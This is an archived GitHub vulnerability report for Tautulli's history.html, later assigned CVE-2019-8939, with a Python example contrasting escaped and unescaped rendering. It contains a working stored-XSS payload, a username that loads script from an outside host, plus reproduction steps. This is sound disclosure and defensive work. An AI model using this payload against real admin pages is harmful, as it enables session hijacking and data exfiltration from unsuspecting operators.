This repository has been archived by the owner on Mar 8, 2021. It is now read-only.

Insufficient username filtering in history.html allows XSS and data exfiltration #161

Closed
geeknik opened this issue Feb 19, 2019 · 1 comment

Comments


geeknik commented Feb 19, 2019

Version:
2.1.26

What you did?
I changed my Plex username to geeknik"><script src=https://zed.xss.ht></script>.

What happened?
Tautulli does not filter out JavaScript when reading usernames and when the admin visits the History page, the JavaScript is executed in the context of said admin.

Lines 112-128 are vulnerable:
https://github.com/Tautulli/Tautulli/blob/56a91de2c4ff0fdd8fbdff4dd7d7677bd16a4b28/data/interfaces/default/history.html#L112

Here we can see how it is reflected:

<label>
     <select name="history-user" id="history-user" class="btn" style="color: inherit;">
     <option value="">All Users</option>
     <option disabled="">────────────</option>
     <option value="xxx">user1</option><option value="xxx">user2</option><option value="xxx">user3</option><option value="xxx">user4</option><option value="xxx">DomitianX</option><option value="xxx">geeknik"&gt;<script src="https://zed.xss.ht"></script></option><option value="xxx">user5</option><option value="xxx">user6</option><option value="xxx">user7</option><option value="xxx">user8</option><option value="0">Local</option><option value="xxx">user9</option><option value="xxx">user10</option><option value="xxx">user11</option><option value="xxx">user12</option><option value="xxx">user13</option><option value="xxx">user14</option><option value="xxx">user15</option><option value="xxx">user16</option><option value="xxx">user17</option></select>
</label>

What you expected?
I didn't expect my friend's Plex server to leak a bunch of information at me.

How can we reproduce your issue?
Set up a Plex Media Server, install Tautulli, and create a normal Plex user account to consume media. Change the user account name to something with JavaScript. Visit the Tautulli History page.
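The defect in the report is that the user's display name is interpolated into the `<option>` markup verbatim. The following is an added example, not code from the Tautulli project or from the reporter: it renders the same user `<select>` in plain Python twice, once mirroring the unescaped interpolation and once with `html.escape`, so the difference can be checked mechanically. The user rows and the marker name are constructed sample data, and `render_user_select` and `contains_injected_tag` are helper names chosen here; in Tautulli's Mako templates the equivalent fix is the `| h` escaping filter on the interpolated expression.

```python
import html

# Constructed sample rows in the shape the History page needs (real rows carry more fields).
# The second name carries markup so the escaped and unescaped renderings can be compared.
SAMPLE_USERS = [
    {"user_id": 1, "friendly_name": "user1"},
    {"user_id": 2, "friendly_name": 'alice"><script>/* constructed marker */</script>'},
    {"user_id": 0, "friendly_name": "Local"},
]


def render_option_unsafe(user):
    # Mirrors the reported defect: the display name goes into the HTML as-is, so a name
    # containing markup terminates the <option> text and injects new elements.
    return '<option value="%s">%s</option>' % (user["user_id"], user["friendly_name"])


def render_option_safe(user):
    # html.escape turns & < > " ' into entities, so the name is rendered as inert text
    # whatever characters it contains. quote=True also covers the attribute context.
    return '<option value="%s">%s</option>' % (
        html.escape(str(user["user_id"]), quote=True),
        html.escape(user["friendly_name"], quote=True),
    )


def render_user_select(users, escape=True):
    # Build the whole <select> the way history.html does, with or without escaping.
    render = render_option_safe if escape else render_option_unsafe
    parts = [
        '<select name="history-user" id="history-user" class="btn">',
        '<option value="">All Users</option>',
    ]
    parts.extend(render(u) for u in users)
    parts.append("</select>")
    return "".join(parts)


def contains_injected_tag(markup):
    # Simple post-render check: a select built from user names must never contain a raw
    # <script tag. Useful as a regression assertion in a template test.
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("unescaped injects markup:", contains_injected_tag(render_user_select(SAMPLE_USERS, escape=False)))
    print("escaped stays inert:", not contains_injected_tag(render_user_select(SAMPLE_USERS)))
    print(render_option_safe(SAMPLE_USERS[1]))
```

The escaped rendering keeps the literal name visible to the admin (they still see the odd username in the dropdown) while the browser parses it as text rather than as elements, which is the behaviour the History page should have had for every user-supplied field it displays.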


geeknik commented Feb 19, 2019

CVE-2019-8939 has been assigned to this flaw by MITRE.
